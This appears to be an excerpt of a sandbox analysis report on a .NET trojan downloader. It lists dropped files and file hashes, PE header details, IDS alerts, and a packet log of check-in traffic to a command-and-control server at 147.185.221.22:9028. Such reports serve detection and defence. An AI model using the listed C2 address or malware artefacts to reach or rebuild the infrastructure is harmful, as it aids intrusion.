File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	0.7310370201569906
Encrypted:	false
SSDEEP:	96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
MD5:	A802F475CA2D00B16F45FEA728F2247C
SHA1:	AF57C02DA108CFA0D7323252126CC87D7B608786
SHA-256:	156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
SHA-512:	275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8279.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.5161495002712742
Encrypted:	false
SSDEEP:	96:s3n5HGsht8kAM0hsYfxqYgXZBqIcsrl3tuY2sWsqF:c5mF5wnpx9uYSF
MD5:	16A6EDF5F48F2A7B20B3B8825384B05C
SHA1:	A59542299A41166F515B18AB8CBC3D72517ED207
SHA-256:	3E1A2BB358B396C201A6058EC8A05E25B167255EB3DAEEB1130331A298CC6F93
SHA-512:	7C4C9D69B05EA5B120C0DB6DF7D0C4487387659AF6D17C387503CA360EF8430F676B0964B6BC3C368BA4DC8D0E648B2750C26970D833788982BBF5BC04AC632D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................S`..=......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8299.tmp.dat

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	163840
Entropy (8bit):	0.44975538801868414
Encrypted:	false
SSDEEP:	96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
MD5:	89E4498D0328AFC71113CC75EBE7D770
SHA1:	120CF58C897FF1025F8B4F854A21821D948F74BC
SHA-256:	F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
SHA-512:	7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
Malicious:	false
Preview:	SQLite format 3......@ .......#..................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Pictures\xdwdUpdate.exe

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	738219008
Entropy (8bit):	0.01747672980312603
Encrypted:	false
SSDEEP:
MD5:	33DA7ED1E2C973375F265DAAA763EA08
SHA1:	7680E4B6C739F829AA38994D8BBBDA42B373514D
SHA-256:	307A368F3D1DC624537CA358916801FD68A61411D7E34EACCDE660BC86A2275B
SHA-512:	8588B5FFD25BCFC974E1956BA41015DC075ED325A039850BFA8BEFB7B05C0D7B15931C58960F54CCBF222CA65F3CB940C6A255D622B3F64CAA2407CD55904421
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oA............"...0..H..........^f... ........@.. ....................................@..................................f..W.................................................................................... ............... ..H............text...dF... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B................@f......H.......t]..................i............................................W......H3.......W......3.........(....b.{.....oN...(O....oP....(....(....sR........(....(....sR........( ...(....sR........J.s....}.....(.......$....s.....%....(}.....o.....(.....s.... .:.. 0u..o....(....~=...(....&.s..........j(1...(....~/...(i....-...V(i....Y...(j....Z...".(.......(....r.4.p.n...!...A.....o...!".......p.....(....!A............!.j................!(..;..........!.A.u.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.570089431215532
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	CVmkXJ7e0a.exe
File size:	1'070'080 bytes
MD5:	b70651a7c5ec8cc35b9c985a331ffca3
SHA1:	8492a85c3122a7cac2058099fb279d36826d1f4d
SHA256:	ed9d94e2dfeb610cb43d00e1a9d8eec18547f1bca2f489605f0586969f6cd6d6
SHA512:	3819216764b29dad3fabfab42f25f97fb38d0f24b975366426ce3e345092fc446ff13dd93ab73d252ea5f77a7fc055ad251e7017f65d4de09b0c43601b5d3fd5
SSDEEP:	12288:IvVfFpam2L6ELLPVle8NLDnWM7b8PI/ZU3Y9W6NZwbfnh:I9feZffLSMcPI63MZ6h
TLSH:	2335800DFE91E905DE1E3DB7CFE610000B7164C1AE1285562119AFFE8F663B299E267C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...oA............"...0..H..........^f... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x50665e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x106604	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x108000	0x610	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x104664	0x104800	eadf2cf4161a5a481afc461c85f18021	False	0.4357821122240883	data	5.572175821825279	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x108000	0x610	0x800	57e808706c5db771401b390d11ec9d53	False	0.35498046875	data	4.678881891257474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10a000	0xc	0x200	246ab2059d94699765f1d065ef4293f1	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1080a0	0x384	data			0.45111111111111113
RT_MANIFEST	0x108424	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T08:25:19.876885+0100	2851746	ETPRO MALWARE MSIL/TrojanDownloader.Small.CUV Variant Checkin	1	192.168.11.20	49720	147.185.221.22	9028	TCP
2024-12-13T08:25:20.106785+0100	2851746	ETPRO MALWARE MSIL/TrojanDownloader.Small.CUV Variant Checkin	1	192.168.11.20	49721	147.185.221.22	9028	TCP
2024-12-13T08:25:22.803331+0100	2851746	ETPRO MALWARE MSIL/TrojanDownloader.Small.CUV Variant Checkin	1	192.168.11.20	49722	147.185.221.22	9028	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:25:09.808725119 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:09.808746099 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:09.808989048 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:09.816139936 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:09.816150904 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:10.056997061 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:10.057204008 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:10.060650110 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:10.060657024 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:10.061933994 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:10.094904900 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:10.142205000 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:10.746144056 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:10.746231079 CET	443	49714	104.20.4.235	192.168.11.20
Dec 13, 2024 08:25:10.746356964 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:10.750536919 CET	49714	443	192.168.11.20	104.20.4.235
Dec 13, 2024 08:25:11.577630043 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:11.704217911 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:11.704448938 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:12.049750090 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:18.452250004 CET	49719	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:18.566265106 CET	80	49719	104.16.185.241	192.168.11.20
Dec 13, 2024 08:25:18.566425085 CET	49719	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:18.566581964 CET	49719	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:18.680437088 CET	80	49719	104.16.185.241	192.168.11.20
Dec 13, 2024 08:25:18.693553925 CET	80	49719	104.16.185.241	192.168.11.20
Dec 13, 2024 08:25:18.701617956 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:18.735810995 CET	49719	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:25:19.004245996 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.004689932 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.297336102 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.371305943 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.387551069 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.422517061 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.514789104 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.515048981 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.515218019 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.622543097 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.622813940 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.624666929 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.668421030 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.668659925 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.751719952 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.751998901 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.752135992 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.875475883 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:19.876571894 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:19.876884937 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.105808973 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.106785059 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.127278090 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.141524076 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.267504930 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268241882 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268306971 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268431902 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.268510103 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268553972 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268682003 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268716097 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268749952 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268779039 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268814087 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268843889 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268877983 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.268908978 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.269294024 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.269344091 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.354295969 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.389167070 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479258060 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479268074 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479417086 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.479501963 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479510069 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479517937 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479523897 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479532003 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479537964 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479629993 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479639053 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479660988 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.479660988 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.479731083 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479732037 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.479738951 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.479830980 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.479938984 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.515079975 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.518930912 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519016981 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519028902 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519114971 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.519160032 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.519681931 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519695997 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519706011 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519716024 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519732952 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519742966 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519752026 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519815922 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519819021 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.519936085 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.519992113 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.520004988 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.520015001 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.520106077 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.520118952 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.520128012 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.520138025 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.520145893 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.521181107 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.521230936 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.542550087 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.594024897 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.727130890 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.727298021 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.727310896 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.727324963 CET	9028	49721	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.728394032 CET	49721	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.769670963 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.769690037 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.769840002 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.769853115 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.769871950 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.769881964 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.769891024 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.769959927 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.770032883 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.770518064 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770543098 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770555019 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770608902 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770620108 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770661116 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.770800114 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.770854950 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770868063 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770878077 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770886898 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770896912 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770906925 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770916939 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770940065 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770950079 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.770998001 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.771080971 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771084070 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771146059 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.771294117 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.771503925 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771576881 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771586895 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771676064 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771697998 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771708012 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771718025 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771727085 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771735907 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771936893 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771949053 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771971941 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771982908 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.771991968 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.772001028 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.772011042 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.772214890 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:20.772722960 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.772722960 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.772821903 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.772821903 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.773020983 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:20.773219109 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.020415068 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020622015 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020648003 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020658970 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020668983 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020678997 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020688057 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020697117 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.020759106 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.020837069 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.021397114 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021478891 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021491051 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021584034 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021786928 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021800041 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021809101 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021819115 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021828890 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021838903 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021848917 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021858931 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021873951 CET	49720	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:21.021874905 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021884918 CET	9028	49720	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:21.021894932 CET	9028	49720	147.185.221.22	192.168.11.20
